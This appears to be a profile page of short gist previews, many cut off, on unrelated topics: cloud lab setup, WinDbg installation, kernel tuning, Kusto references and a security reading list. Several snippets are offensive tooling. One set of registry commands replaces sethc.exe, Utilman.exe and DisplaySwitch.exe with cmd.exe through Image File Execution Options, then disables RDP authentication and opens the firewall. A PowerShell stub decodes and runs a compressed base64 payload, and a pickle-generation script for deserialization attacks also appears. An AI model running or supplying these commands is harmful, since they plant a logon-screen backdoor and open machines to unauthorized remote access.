tuantmb

Task 1: Create a project jumphost instance

#Navigation menu > Compute engine > VM Instance
gcloud config set compute/zone us-east1-b
gcloud config set compute/region us-east1

gcloud compute instances create nucleus-jumphost \
	--machine-type f1-micro

tuantmb

Links:

• WDK and WinDbg downloads
• UnOfficial Windows 10 Windbg

Get WinDbg

• goto WDK and WinDbg downloads
• scroll down to Standalone Debugging Tools for Windows (WinDbg)
• Get the standalone debugging tools (WinDbg) as part of Windows 8.1 SDK
• execute sdksetup.exe

tuantmb

let autoNext = () => {
  const modal = document.getElementsByClassName('player-modal is-active');
  if (modal.length > 0) {
    // const buttons = document.querySelectorAll('[data-css-176v989]');
    const buttons = document.getElementsByClassName('u-full-width');
    console.log('checking...', buttons.length);

    for (let i = 0; i < buttons.length; i++) {
      const button = buttons[i];
      console.log(button.textContent);

tuantmb

$base64data = "insert compressed and base64 data here"
$data = [System.Convert]::FromBase64String($base64data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null

$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))

while ($line = $sr.ReadLine()) {  

tuantmb

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

netsh firewall set service type = remotedesktop mode = enable
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

net start TermService

tuantmb

# ADVANCED HUNTING REFERENCES

# Kusto Queries
# - Query Language REFERENCE
#   - https://docs.microsoft.com/en-us/azure/data-explorer/kusto/query/
# - Regular Expression  in Kusto
#   - https://docs.microsoft.com/en-us/azure/data-explorer/kusto/query/re2
# - Allowed Regular Expression Syntax for Kusto Queries
#   - https://github.com/google/re2/wiki/Syntax

tuantmb

From: http://redteams.net/bookshelf/
Techie

    Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
    Social Engineering: The Art of Human Hacking by Christopher Hadnagy
    Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
    The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
    Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
    Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
    The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors

tuantmb

### KERNEL TUNING ###

# Increase size of file handles and inode cache
fs.file-max = 2097152

# Do less swapping
vm.swappiness = 10
vm.dirty_ratio = 60
vm.dirty_background_ratio = 2

tuantmb

#!/usr/bin/env python

'''
    0xBADCA7

    Vodka goes down the throat better with pickle.
    This script generates pickled object representation. Good for CTFs.
    Params: [1] function, [2] parameter, [3] pickle type

    Sample run:

tuantmb

Add new Youtube-dl copy to DMCA repo

1. Fork https://github.com/github/dmca
2. Download latest youtube-dl source code from https://yt-dl.org/latest
3. Extract

   tar -xvf youtube-dl-2020.09.20.tar.gz
   

4. Push code to your fork as the GitHub CEO